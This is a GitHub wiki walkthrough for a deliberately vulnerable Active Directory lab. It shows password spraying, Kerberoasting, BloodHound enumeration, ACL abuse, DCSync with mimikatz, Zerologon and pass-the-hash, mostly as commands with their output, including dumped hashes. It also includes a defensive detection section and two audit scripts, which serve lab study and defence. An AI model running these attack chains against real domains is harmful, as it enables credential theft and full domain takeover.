WIP for writeup - WaterExecution/vulnerable-AD-plus GitHub Wiki

Password Spraying

ldapsearch -h 10.10.10.100 -x -b "DC=change,DC=me" | grep -i "company default password"
description: Company default password(Reset ASAP)
...
sAMAccountName: nichole.janelle
# Gavrielle Guinna, Users, change.me
description: Company default password(Reset ASAP)
...
sAMAccountName: gavrielle.guinna

Create a password list from the default password prefix:

echo "change" >> potential.txt
hashcat -a 6 potential.txt ?d?d?d --force --stdout > password.txt

Using crackmapexec, you can brute-force either account with the generated password list.

cme smb 10.10.10.100 -u nichole.janelle -p password.txt
cme smb 10.10.10.100 -u Gavrielle.Guinna -p password.txt
SMB         10.10.10.100    445    DC               [+] change.me\nichole.janelle:maxwell  
SMB         10.10.10.100    445    DC               [+] change.me\Gavrielle.Guinna:maxwell  
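The spraying above works because the account descriptions in LDAP leak the password scheme. As an added defender-side check (not part of the original writeup), this Python snippet parses ldapsearch LDIF output, including folded continuation lines that start with a space, and reports every account whose description hints at a credential. The LDIF entries are constructed for this example, modelled on the output above.

```python
import re

# Constructed LDIF sample modelled on the ldapsearch output above (entries and
# descriptions are made up for this example; ldapsearch folds long attribute
# values onto continuation lines that begin with a single space).
SAMPLE_LDIF = """\
# Nichole Janelle, Users, change.me
dn: CN=Nichole Janelle,CN=Users,DC=change,DC=me
description: Company default password(Reset ASAP)
sAMAccountName: nichole.janelle

# Jessika Luella, Users, change.me
dn: CN=Jessika Luella,CN=Users,DC=change,DC=me
description: New user generated passw
 ord: =W{Z5FM
sAMAccountName: jessika.luella

# Plain User, Users, change.me
dn: CN=Plain User,CN=Users,DC=change,DC=me
description: Finance department
sAMAccountName: plain.user
"""

# Words that usually mean a password or password policy is written in the field.
PASSWORD_HINT = re.compile(r"passw(or)?d|pwd|credential", re.IGNORECASE)


def parse_ldif(text):
    """Return one dict per LDIF entry; folded continuation lines are re-joined."""
    entries, current, last_key = [], {}, None
    for raw in text.splitlines():
        if raw.startswith("#"):          # ldapsearch comment lines
            continue
        if raw == "":                    # blank line ends an entry
            if current:
                entries.append(current)
            current, last_key = {}, None
            continue
        if raw.startswith(" ") and last_key is not None:
            current[last_key] += raw[1:]  # continuation of the previous value
            continue
        key, _, value = raw.partition(":")
        key, value = key.strip(), value.strip()
        current[key] = value
        last_key = key
    if current:
        entries.append(current)
    return entries


def find_password_hints(text):
    """Return (sAMAccountName, description) for entries whose description
    mentions a password; these accounts need a reset and a cleaned description."""
    return [(e.get("sAMAccountName", "?"), e["description"])
            for e in parse_ldif(text)
            if "description" in e and PASSWORD_HINT.search(e["description"])]


if __name__ == "__main__":
    for account, desc in find_password_hints(SAMPLE_LDIF):
        print(f"{account}: {desc}")
```

Feed it the raw output of `ldapsearch -x -b "DC=change,DC=me"` to audit a real directory; the folded `passw`/`ord` entry shows why a plain grep on single lines can miss hits.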

Kerberoast

ldapsearch -h 10.10.10.100 -x -b "DC=change,DC=me" | grep -i service
servicePrincipalName: mssql_svc/mssqlserver.change.me
servicePrincipalName: http_svc/httpserver.change.me
servicePrincipalName: exchange_svc/exserver.change.me

Resetting user account

Resetting this account's password lets us log in over WinRM. Its description reads: New user generated password: =W{Z5FM

smbpasswd -r 10.10.10.100 -U 'jessika.luella'

Kerberoasting

GetUserSPNs.py -request -dc-ip 10.10.10.100 change.me/jessika.luella
ServicePrincipalName             Name          MemberOf  PasswordLastSet             LastLogon  Delegation
-------------------------------  ------------  --------  --------------------------  ---------  ----------
mssql_svc/mssqlserver.change.me  mssql_svc               2021-06-16 23:28:33.186290  <never>
http_svc/httpserver.change.me    http_svc                2021-06-07 22:42:54.144313  <never>
exchange_svc/exserver.change.me  exchange_svc            2021-06-07 22:42:54.175986  <never>


Hashcat

hashcat.exe -m 13100 -a 0 hashes.txt password.txt

http_svc: mike

Privilege Escalation

Abusing ACLs/ACEs

Download: BloodHoundAD

Installation
sudo apt install neo4j
sudo neo4j console

Login to http://localhost:7474 (neo4j:neo4j)
*Prompt for password change*

./BloodHound --no-sandbox
Login with neo4j:password

Disable Windows Defender:

Download: SharpHound

description: Company default password(Reset ASAP)

Reset password - Password Spraying

smbpasswd -r 10.10.10.100 -U 'bibi.levon'

Remote login

evil-winrm -i 10.10.10.100 -u bibi.levon

Upload SharpHound

*Evil-WinRM* PS C:\Users\bibi.levon\appdata\Local\temp> upload SharpHound.exe

Run SharpHound

*Evil-WinRM* PS C:\Users\bibi.levon\appdata\Local\temp> .\SharpHound.exe
Output
----------------------------------------------
Initializing SharpHound at 2:15 AM on 6/9/2021
----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain CHANGE.ME using path CN=Schema,CN=Configuration,DC=change,DC=me
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 267 objects finished (+267 ∞)/s -- Using 28 MB RAM
Enumeration finished in 00:00:00.6560165
Compressing data to .\20210609021515_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 2:15 AM on 6/9/2021! Happy Graphing!

Download SharpHound

*Evil-WinRM* PS C:\Users\bibi.levon\appdata\Local\temp> download 20210609021515_BloodHound.zip
Output
Info: Downloading C:\Users\bibi.levon\appdata\Local\temp\20210609021515_BloodHound.zip to 20210609021515_BloodHound.zip

Info: Download successful!

Using BloodHound

Drag and drop the zip file into BloodHound

Search for users you have access to:

Right click and select "Mark User as Owned":

Select shortest paths to domain admins from owned principals:

Abuse DnsAdmins

sudo smbserver.py folder . -username user -password password -smb2support
*Evil-WinRM* PS C:\tmp> net use \\10.10.10.5\folder /user:user password

DCSync

Recon:

Using PowerView and BloodHound, we need to find accounts we already have access to that are linked (through ACLs) to accounts holding directory replication rights, which are what DCSync requires.

Initial Access

ldapsearch -h 10.10.10.100 -x -b "DC=change,DC=me"

output

description: Company default password(Reset ASAP)
sAMAccountName: sandy.morena
cme smb 10.10.10.100 -u sandy.morena -p ADpassword.txt

output

sandy.morena:change000
smbpasswd -r 10.10.10.100 -U sandy.morena
old password: change000
new password: 1234
evil-winrm -i 10.10.10.100 -u sandy.morena -p 1234

PowerSploit

Using PowerView to see which accounts have directory replication rights:

upload PowerView.ps1
import-module .\PowerView.ps1
Get-ObjectACL "DC=change,DC=me" -ResolveGUIDs | ? {($_.ObjectAceType -match 'Replication-Get')}

output

AceQualifier           : AccessAllowed                                                                  
ObjectDN               : DC=change,DC=me                                                                
ActiveDirectoryRights  : ExtendedRight                                                                  
ObjectAceType          : DS-Replication-Get-Changes-In-Filtered-Set                                                                                                             
SecurityIdentifier     : S-1-5-21-899434533-4132491356-2237190077-1657

Converting the SID to an account name (this only works for real accounts, not built-in ones):

Get-ADUser -Identity S-1-5-21-899434533-4132491356-2237190077-1657 

output:

DistinguishedName : CN=Filippa Claudina,CN=Users,DC=change,DC=me
Name              : Filippa Claudina
ObjectGUID        : 8aac2476-2c50-4e10-9487-2afae074f4c2
SamAccountName    : filippa.claudina
SID               : S-1-5-21-899434533-4132491356-2237190077-1657
Surname           : Claudina
UserPrincipalName : [email protected]

Hence we know that Filippa Claudina has directory replication rights.

BloodHound

apt-get install bloodhound
apt-get install neo4j
neo4j start
upload SharpHound.exe
.\SharpHound.exe
download 0210912204149_BloodHound.zip

Using the initially accessed account, I uploaded and executed SharpHound. FYI: disable Windows Defender first, then upload the zip file to BloodHound.

Using BloodHound I found out that sandy.morena has "WriteOwner" over filippa.claudina (the replication account).

Take note: it may take a while to find an account linked to one of the replication accounts. I recommend starting from the password-sprayed or generated-password accounts. If none of those accounts is linked, you may need to rerun the script until you get one.

Privilege Escalation via ACL abuse

Once a link is found, we can escalate to that account via ACL abuse.

import PowerView.ps1

$SecPassword = ConvertTo-SecureString '1234' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('change.me\sandy.morena', $SecPassword)

Set-DomainObjectOwner -Credential $Cred -Identity filippa.claudina -OwnerIdentity sandy.morena

Add-DomainObjectAcl -Credential $Cred -TargetIdentity filippa.claudina -PrincipalIdentity sandy.morena -Rights All
  1. Import PowerView.
  2. Store sandy.morena's password in $SecPassword as a SecureString.
  3. Build $Cred as a PSCredential for change.me\sandy.morena using that SecureString.
  4. Using the WriteOwner right, change the owner of filippa.claudina to sandy.morena with $Cred.
  5. As the new owner, extend sandy.morena's rights over filippa.claudina from "own" to GenericAll (-Rights All).
net user filippa.claudina 1234 /domain
evil-winrm -i 10.10.10.100 -u filippa.claudina -p 1234

Change filippa.claudina's password to 1234 and log in to the account with evil-winrm.

DCsync via mimikatz

upload mimikatz.exe
.\mimikatz.exe "lsadump::dcsync /user:krbtgt" exit
** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 31/8/2021 6:36:24 PM
Object Security ID   : S-1-5-21-899434533-4132491356-2237190077-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: 1904f1e6c79caf1a92aab3bc1215da5c
    ntlm- 0: 1904f1e6c79caf1a92aab3bc1215da5c
    lm  - 0: 5281a28c7aa26b3ef017a47789107617
** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 7/6/2021 10:14:55 PM
Object Security ID   : S-1-5-21-899434533-4132491356-2237190077-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 92937945b518814341de3f726500d4ff

Silver Ticket (...)

Golden Ticket (...)

Pass-the-Hash (...)

Pass-the-Ticket (...)

SMB Signing Disabled

Bad WinRM permission

Public SMB Share

  1. (GPO) Accounts: Guest account status: Enabled
  2. (GPO) Network access: Let Everyone permissions apply to anonymous users: Enabled
  3. (GPO) Network access: Shares that can be accessed anonymously: C:\Common
  4. add "EVERYONE" to C:\Common
smbclient -L //10.10.10.100
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Common          Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon 
smbclient //10.10.10.100/Common
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Aug 30 23:01:11 2021
  ..                                  D        0  Mon Aug 30 23:01:11 2021

                15570943 blocks of size 4096. 12464639 blocks available
smb: \> 

Zerologon

Vulnerable Version

Windows Version          OS Build / Update
-----------------------  --------------------------------------------
Windows Server 2019      OS Build 17763.1757
Windows Server 2016      OS Build 14393.4225
Windows Server 2012      KB4601384 update
Windows Server 2012 R2   KB4601384 update
Windows Server 2008 R2   KB4601347 update
Windows 10               18363.1377, 18362.1016, 19041.804, 19042.804

Get NetBIOS Name

nbtscan 10.10.10.100
IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
10.10.10.100     DC              <server>  <unknown>        00:0c:29:fd:4c:fb

NetBIOS name: WIN-E99S3QT2JTU

Running zerologon exploit

git clone https://github.com/risksense/zerologon.git
python3 set_empty_pw.py DC 10.10.10.100
Performing authentication attempts...
==========================================================================
NetrServerAuthenticate3Response 
ServerCredential:               
    Data:                            b'\r9,I\xe6L\xbdE' 
NegotiateFlags:                  556793855 
AccountRid:                      1000 
ErrorCode:                       0 


server challenge b'\r\x0f\xad\xdd\xac\xf5\x9d\xb5'
NetrServerPasswordSet2Response 
ReturnAuthenticator:            
    Credential:                     
        Data:                            b"\x01F$=G\x8b'{" 
    Timestamp:                       0 
ErrorCode:                       0 



Success! DC should now have the empty string as its machine password.

Dumping all hashes in DC

secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'change.me/[email protected]'
Administrator:500:aad3b435b51404eeaad3b435b51404ee:92937945b518814341de3f726500d4ff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:be9be7863bd01ce4f7dc7b83b7729c2d:::
change.me\jen.roobbie:1103:aad3b435b51404eeaad3b435b51404ee:6b0d51de7c9d0b788b5c4be4d58281a6:::
change.me\kevin.morissa:1104:aad3b435b51404eeaad3b435b51404ee:b5eea08f4e39fa88099444b8c03f309b:::
...

Remote Logon using pass-the-hash attack

evil-winrm -i 10.10.10.100 -u administrator -H "92937945b518814341de3f726500d4ff"

Detection

Event Viewer

Event ID: 4624
Task Category: Logon
Logged: 11/6/2021 12:01:47 AM 
An account was successfully logged on.

Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		change\Administrator
	Account Name:		Administrator
	Account Domain:		change
	Logon ID:		0x1ECBD0
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{00000000-0000-0000-0000-000000000000}

Process Information:
	Process ID:		0x0
	Process Name:		-

Network Information:
	Workstation Name:	-
	Source Network Address:	-
	Source Port:		-

Detailed Authentication Information:
	Logon Process:		NtLmSsp 
	Authentication Package:	NTLM
	Transited Services:	-
	Package Name (NTLM only):	NTLM V2
	Key Length:		128

This event is generated when a logon session is created. It is generated on the computer that was accessed.

The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.

The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).

The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.

The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.

The impersonation level field indicates the extent to which a process in the logon session can impersonate.

The authentication information fields provide detailed information about this specific logon request.
	- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
	- Transited services indicate which intermediate services have participated in this logon request.
	- Package name indicates which sub-protocol was used among the NTLM protocols.
	- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.

Description: relevant Event IDs include 4624, 4742 and 5805 (for password changes) and 4672. Take note of:

  1. Time of the event
  2. Source Network Address
  3. Source Port
  4. Authentication Package (NTLM/Kerberos)
  5. Logon Type: 3
  6. Account Name
  7. Security ID
Source: Sysmon
Event ID: 3
Task Category: Network connection Detected (rule: Network Connect)
Logged: 11/6/2021 12:01:47
Network connection detected:
RuleName: -
UtcTime: 2021-06-10 14:07:18.539
ProcessGuid: {cbc30ecf-aaae-60c1-0c00-000000000600}
ProcessId: 684
Image: C:\Windows\System32\lsass.exe
User: NT AUTHORITY\SYSTEM
Protocol: tcp
Initiated: false
SourceIsIpv6: false
SourceIp: 10.10.10.1
SourceHostname: -
SourcePort: 51583
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 10.10.10.100
DestinationHostname: DC.change.me
DestinationPort: 49670
DestinationPortName: -
Source: Sysmon
Event ID: 3
Task Category: Network connection Detected (rule: Network Connect)
Logged: 11/6/2021 12:01:47
Network connection detected:
RuleName: -
UtcTime: 2021-06-10 14:07:18.535
ProcessGuid: {cbc30ecf-aaaf-60c1-0f00-000000000600}
ProcessId: 960
Image: C:\Windows\System32\svchost.exe
User: NT AUTHORITY\NETWORK SERVICE
Protocol: tcp
Initiated: false
SourceIsIpv6: false
SourceIp: 10.10.10.1
SourceHostname: -
SourcePort: 51582
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 10.10.10.100
DestinationHostname: DC.change.me
DestinationPort: 135
DestinationPortName: epmap

Description: Sysmon records the network connection. Take note of:

  1. Image: C:\Windows\System32\svchost.exe & C:\Windows\System32\lsass.exe
  2. Time
  3. User
  4. Source IP

Wireshark

Description: by sending a large number of Netlogon messages in which various fields are filled with zeroes, an attacker can change the computer password of the domain controller that is stored in Active Directory. In the capture this shows up as Client Credential: 00000000000

Description: take note of multiple packets using the protocols RPC_NETLOGON and DCERPC with Client Credential: 0000000000 and Server Credential: 0000000000

Task manager / Resource Monitor

Description: the attack can cause heavy network utilization. It also abuses lsass.exe for network connectivity.

Conclusion

We can conclude that on 11/6/2021 around 12am, the Administrator account was logged on. Sysmon shows that around the same time there was a network connection; the images used were lsass.exe and svchost.exe, and the source IP was 10.10.10.1. In Wireshark at the same time there were multiple packets with Client and Server Credentials consisting of all zeroes using the protocols RPC_NETLOGON and DCERPC. The source & Destination IP were 10.10.10.1. There was also a surge in network utilization during that period attributed to lsass.exe. Therefore we can conclude that the packets and logons came from Zerologon exploitation used to obtain an unauthorized logon to the Administrator account.
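The conclusion above is essentially a manual correlation of a Security 4624 record with a Sysmon Event 3 record. As an added example (not part of the original writeup), this Python snippet automates that correlation: it flags the 4624 traits observed after the pass-the-hash logon (network NTLM logon of Administrator with no workstation name or source address) and pairs each such logon with inbound Sysmon connections to lsass.exe inside a short time window. The two records and their timestamps are constructed so the sources line up; the "Subject Security ID" key is a flattened form of the nested field shown in the event above.

```python
from datetime import datetime, timedelta

# Constructed records in the same key/value layout as the Event Viewer and
# Sysmon output above; timestamps are made up so the two sources line up.
LOGON_4624 = """\
UtcTime: 2021-06-10 14:07:18.600
Logon Type: 3
Subject Security ID: NULL SID
Account Name: Administrator
Account Domain: change
Workstation Name: -
Source Network Address: -
Authentication Package: NTLM
"""

SYSMON_3 = """\
UtcTime: 2021-06-10 14:07:18.539
Image: C:\\Windows\\System32\\lsass.exe
User: NT AUTHORITY\\SYSTEM
Initiated: false
SourceIp: 10.10.10.1
DestinationIp: 10.10.10.100
DestinationPort: 49670
"""


def parse_kv(text):
    """Split 'Key: Value' lines (tabs or spaces around the colon) into a dict."""
    rec = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            rec[key.strip()] = value.strip()
    return rec


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def suspicious_network_logon(ev):
    """4624 traits from the event above: a network NTLM logon of Administrator
    that carries neither a workstation name nor a source network address."""
    return (ev.get("Logon Type") == "3"
            and ev.get("Authentication Package") == "NTLM"
            and ev.get("Account Name", "").lower() == "administrator"
            and ev.get("Workstation Name") == "-"
            and ev.get("Source Network Address") == "-")


def correlate(logons, sysmon, window=timedelta(seconds=5)):
    """Pair each suspicious 4624 with inbound Sysmon 3 connections handled by
    lsass.exe within the window; return (account, source ip) alerts."""
    alerts = []
    for ev in logons:
        if not suspicious_network_logon(ev):
            continue
        t = parse_time(ev["UtcTime"])
        for net in sysmon:
            if (net.get("Initiated") == "false"
                    and net.get("Image", "").lower().endswith("\\lsass.exe")
                    and abs(parse_time(net["UtcTime"]) - t) <= window):
                alerts.append((ev["Account Name"], net["SourceIp"]))
    return alerts


if __name__ == "__main__":
    print(correlate([parse_kv(LOGON_4624)], [parse_kv(SYSMON_3)]))
```

The 4624 heuristic alone is noisy (local service logons also lack a source address); the Sysmon pairing is what narrows it to an external host talking to lsass.exe at the moment of the logon.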

PrintNightmare

HiveNightmare
